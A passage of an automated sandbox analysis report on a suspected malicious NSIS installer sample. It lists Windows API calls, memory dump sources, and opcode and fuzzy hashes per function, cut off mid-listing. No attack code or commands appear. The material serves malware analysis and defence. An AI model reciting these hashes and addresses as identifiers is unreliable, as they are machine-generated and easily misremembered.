                                                                                                                                                                                                                          • lstrcatA.KERNEL32(0042A400,\Temp), ref: 004032E3
                                                                                                                                                                                                                          • GetTempPathA.KERNEL32(000003FC,0042A400,0042A400,\Temp), ref: 004032F7
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(0042A400,Low), ref: 004032FF
                                                                                                                                                                                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,0042A400,0042A400,Low), ref: 00403310
                                                                                                                                                                                                                          • SetEnvironmentVariableA.KERNEL32(TMP,0042A400), ref: 00403318
                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(0042A000), ref: 0040332C
                                                                                                                                                                                                                            • Part of subcall function 00406092: GetModuleHandleA.KERNEL32(?,?,?,00403147,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004060A4
                                                                                                                                                                                                                            • Part of subcall function 00406092: GetProcAddress.KERNEL32(00000000,?), ref: 004060BF
                                                                                                                                                                                                                          • OleUninitialize.OLE32(?), ref: 004033DA
                                                                                                                                                                                                                            • Part of subcall function 004054F3: MessageBoxIndirectA.USER32(00409230), ref: 0040554E
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 004033FB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EnvironmentFileHandleModulePathTempVariablelstrcat$AddressCharCommandDeleteDirectoryErrorExitIndirectInfoInitializeLineMessageModeNextProcProcessUninitializeVersionWindows
                                                                                                                                                                                                                          • String ID: "$.tmp$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu$A
                                                                                                                                                                                                                          • API String ID: 2526692829-1234970838
                                                                                                                                                                                                                          • Opcode ID: ff2c359c01316bfc050fd88e2c90dd2d15a585c3451613b3992265dc25fb6415
                                                                                                                                                                                                                          • Instruction ID: bda156f374487f2bbb29673c031f74f644c2b1eaea70be50b0a917a6d4bf9e43
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff2c359c01316bfc050fd88e2c90dd2d15a585c3451613b3992265dc25fb6415
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17C1E6706082427AE7116F719D4DA2B3EACEB8570AF04457FF542B51E2CB7C9A058B2E
                                                                                                                                                                                                                          Function 00404893 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 004048AB
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 004048B6
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404900
                                                                                                                                                                                                                          • LoadBitmapA.USER32(0000006E), ref: 00404913
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,00404E8A), ref: 0040492C
                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404940
                                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404952
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404968
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404974
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404986
                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404989
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049B4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049C0
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A55
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A80
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A94
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404AC3
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404AD1
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404AE2
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BDF
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C44
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C59
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C7D
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C9D
                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404CB2
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404CC2
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D3B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 00404DE4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404DF3
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,?), ref: 00404E13
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00404E61
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404E6C
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00404E73
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                          • String ID: $M$N
                                                                                                                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                                                                                                                          • Opcode ID: 75ca5f9ff87ea9234ad12ad354446184f0b8554fb780a24899a1359ff82080f1
                                                                                                                                                                                                                          • Instruction ID: c4f70692a945eeac8c46a5cc4d62b09966a4cf856849f89cf4e80ba5cf8d6073
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75ca5f9ff87ea9234ad12ad354446184f0b8554fb780a24899a1359ff82080f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D0250B0A00209AFDB10DF54DC85AAE7BB5FB84315F10817AF611B62E1C7789D42CF58
                                                                                                                                                                                                                          Function 0040559F Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159filestringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,?,766B3410,0042A400,00000000), ref: 004055C8
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00420D28,\*.*,00420D28,?,?,766B3410,0042A400,00000000), ref: 00405610
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00409014,?,00420D28,?,?,766B3410,0042A400,00000000), ref: 00405631
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00409014,?,00420D28,?,?,766B3410,0042A400,00000000), ref: 00405637
                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00420D28,?,?,?,00409014,?,00420D28,?,?,766B3410,0042A400,00000000), ref: 00405648
                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004056F5
                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405706
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                          • String ID: (B$\*.*
                                                                                                                                                                                                                          • API String ID: 2035342205-1007310399
                                                                                                                                                                                                                          • Opcode ID: 0c9b304e695f1c058b9bc3a1cf3591d3ca5b364e210f9e882a6ba4f41c3a16a2
                                                                                                                                                                                                                          • Instruction ID: 8f0c06671bf428c0f48d088e48fc2575de732930cf6b83f410cedc31bee7f7b4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c9b304e695f1c058b9bc3a1cf3591d3ca5b364e210f9e882a6ba4f41c3a16a2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2051D330800A04BADB21AB618D45BBF7BB8DF82714F54457BF445721D2C73C4982DE6E
                                                                                                                                                                                                                          Function 00406344 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: df052f8500bc354d4a21ff453bca24a979c322da877604b446898ac79d7ea655
                                                                                                                                                                                                                          • Instruction ID: 747aed367833ce7965c7456030a986fa8c308b51e1337f5c25afca0a07e996cc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df052f8500bc354d4a21ff453bca24a979c322da877604b446898ac79d7ea655
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35F17670D00229CBCF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF44
                                                                                                                                                                                                                          Function 0011F048 Relevance: 4.3, Strings: 3, Instructions: 596COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: .5rr$4;5$4;5
                                                                                                                                                                                                                          • API String ID: 0-3835424248
                                                                                                                                                                                                                          • Opcode ID: 2ee8c98b15e192edb4e5c5da083108cc30506618f85c1206f3f894ed8649b867
                                                                                                                                                                                                                          • Instruction ID: 3109b89f5bc9caa7e59f7b010bd896ce86ea954372cabcf1621b0b8523f8c896
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ee8c98b15e192edb4e5c5da083108cc30506618f85c1206f3f894ed8649b867
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD529A74E01228CFDB69DF65C885BDDBBB2BB89300F1081EAD409A7255DB359E86CF50
                                                                                                                                                                                                                          Function 38C85B48 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 1b77410b0b697ca42c189c01ef0e325f10cc17a7ebb7bcc4d11087b587cfab9b
                                                                                                                                                                                                                          • Instruction ID: 0953e010cd852c2c2ebc26d870f1db94dcb21dde62738ef189b0308282fbabd8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b77410b0b697ca42c189c01ef0e325f10cc17a7ebb7bcc4d11087b587cfab9b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AE1BF74E01218CFEB65DFA5C944B9DBBB2BF88304F2081A9D408B73A5DB355A85CF15
                                                                                                                                                                                                                          Function 38CA0E98 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972950864.0000000038CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38ca0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: bc89ef65157cf50cd0a08983ba5f69762c4d6b10f31c64b1dd558462a11af346
                                                                                                                                                                                                                          • Instruction ID: eb5a341cc76e76b2a895c8d25b186d9f850d4429ae5be13b0d2b6573dfd84974
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc89ef65157cf50cd0a08983ba5f69762c4d6b10f31c64b1dd558462a11af346
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91D1D274E013188FDB54DFA5C941B9DBBB2BF89300F1081A9D409AB364DB359E85CF50
                                                                                                                                                                                                                          Function 38CA0040 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972950864.0000000038CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38ca0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f4f45c45f59030938a6061d4c51294ed5a9eb83f1c5f17344d7044e413ebc625
                                                                                                                                                                                                                          • Instruction ID: cdb91f5dc35820694d8456eae9ddd5a46d2e4d4fe0e5a36224c757b1e8bcdcf8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4f45c45f59030938a6061d4c51294ed5a9eb83f1c5f17344d7044e413ebc625
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17D1AE74E01218CFDB54DFA9C991B9DBBB2BF89300F6081A9D408AB365DB355E86CF50
                                                                                                                                                                                                                          Function 38C8E7C8 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ae0a78449d27027f5ad38d7351036d53f883df2531af6951862ef7871fd37963
                                                                                                                                                                                                                          • Instruction ID: ce7955fffd85e021713ae5aaac429e0f7a818954f375db4bba785f60b452d694
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae0a78449d27027f5ad38d7351036d53f883df2531af6951862ef7871fd37963
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13D1C174E003188FDB54DFA9C991B9DBBB2BF89300F5081A9D408AB365DB359E86CF51
                                                                                                                                                                                                                          Function 38C8BCC0 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 63868fcce5ab4d2caab9017ea8cabde62fea13906cefe7104f5eec9d4c1d63c3
                                                                                                                                                                                                                          • Instruction ID: c47796f4c827e42f5434d7756194c6ec7f01e842722256db82c64186d6aa7d5e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63868fcce5ab4d2caab9017ea8cabde62fea13906cefe7104f5eec9d4c1d63c3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AAD1C178E003188FDB54DFA5C991B9DBBB2BF89300F5081A9D408AB365DB355E85CF50
                                                                                                                                                                                                                          Function 38C8A4D8 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 5cf61859a9ee2878d847cf598a10a5f6affd26bf304f34c4d4075ff8b17ed7f2
                                                                                                                                                                                                                          • Instruction ID: b8caab66af397bdfa5ea5037d8a8644f302d804e7aef38ca4b449ce3d50d83d1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cf61859a9ee2878d847cf598a10a5f6affd26bf304f34c4d4075ff8b17ed7f2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71D1C174E003188FDB54DFA9C991B9DBBB2BF89300F6081A9D408AB365DB355E85CF51
                                                                                                                                                                                                                          Function 38C879D0 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 713dd2e764e9b2f34751e0d70de968d4202d1128be870f06265368300a28fa16
                                                                                                                                                                                                                          • Instruction ID: d520ac40b55b096ff1af04a3030b4392e297e0b24fc588713e314f08a61ce9f1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 713dd2e764e9b2f34751e0d70de968d4202d1128be870f06265368300a28fa16
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0D1B174E003288FDB54DFA9C991B9DBBB2BF89300F5081A9D408AB365DB359E85CF51
                                                                                                                                                                                                                          Function 38C8FAE8 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3f49b6acaedd96f7f44a6ba305ebefe8f966f7f4542a7f2534fdf83af62e795c
                                                                                                                                                                                                                          • Instruction ID: 4452877674c267aaadbe3a5b892278002a29da268752da7f3757bd0fe4ec7f02
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f49b6acaedd96f7f44a6ba305ebefe8f966f7f4542a7f2534fdf83af62e795c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8BD1B074E003188FDB54DFA5C991B9DBBB2BF89300F6081A9D408AB365DB359E86CF51
                                                                                                                                                                                                                          Function 38C8CFE0 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 334dba1a83aa2728413d3118cc1e2424907a0da8aa4a3a9ccab9ff592991f46b
                                                                                                                                                                                                                          • Instruction ID: bce51f9edad3dfdee4677d3008f983a723ebc33e4f83fd6fe1c8e0dae81993a5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 334dba1a83aa2728413d3118cc1e2424907a0da8aa4a3a9ccab9ff592991f46b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93D1D174E003188FDB54DFA5C991B9DBBB2BF89300F5081A9D408AB365DB359E86CF51
                                                                                                                                                                                                                          Function 38C8B7F8 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: e636bd303b029e92e1d943dc255a0dcab3d474e4b489dd1642e96acde6d2701c
                                                                                                                                                                                                                          • Instruction ID: 62ffe9fcf524246ccb9b1cb57c226ac7549966ce3424c1143003714db98524df
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e636bd303b029e92e1d943dc255a0dcab3d474e4b489dd1642e96acde6d2701c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01D1C174E003188FDB54DFA9C991B9DBBB2BF89300F1081A9D408AB365DB359E85CF51
                                                                                                                                                                                                                          Function 38C88CF0 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b3c516bff0416cdfb1a203e5917a52416d93f85d481c2e9262dcf1b509cb49cf
                                                                                                                                                                                                                          • Instruction ID: f10e9ea633c5ed892627f824d8dbbd1f3973670d52d49838136491bd03875b39
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3c516bff0416cdfb1a203e5917a52416d93f85d481c2e9262dcf1b509cb49cf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94D1B078E003188FDB54DFA5C991B9DBBB2BF89300F5081A9D408AB365DB355E85CF51
                                                                                                                                                                                                                          Function 38C8C188 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f56a1dd45e06e8ba7041267bc422e22a224cb101b77c0fa1c85b309d091efb6e
                                                                                                                                                                                                                          • Instruction ID: ed3e32611c5ff488a7097c0b63adebd48a64c8c152334c58cfa2e262a4eba605
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f56a1dd45e06e8ba7041267bc422e22a224cb101b77c0fa1c85b309d091efb6e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3BD1AF74E002188FDB54DFA9C991B9DBBF2BF89300F5081A9D408AB3A5DB359E85CF51
                                                                                                                                                                                                                          Function 38C89680 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
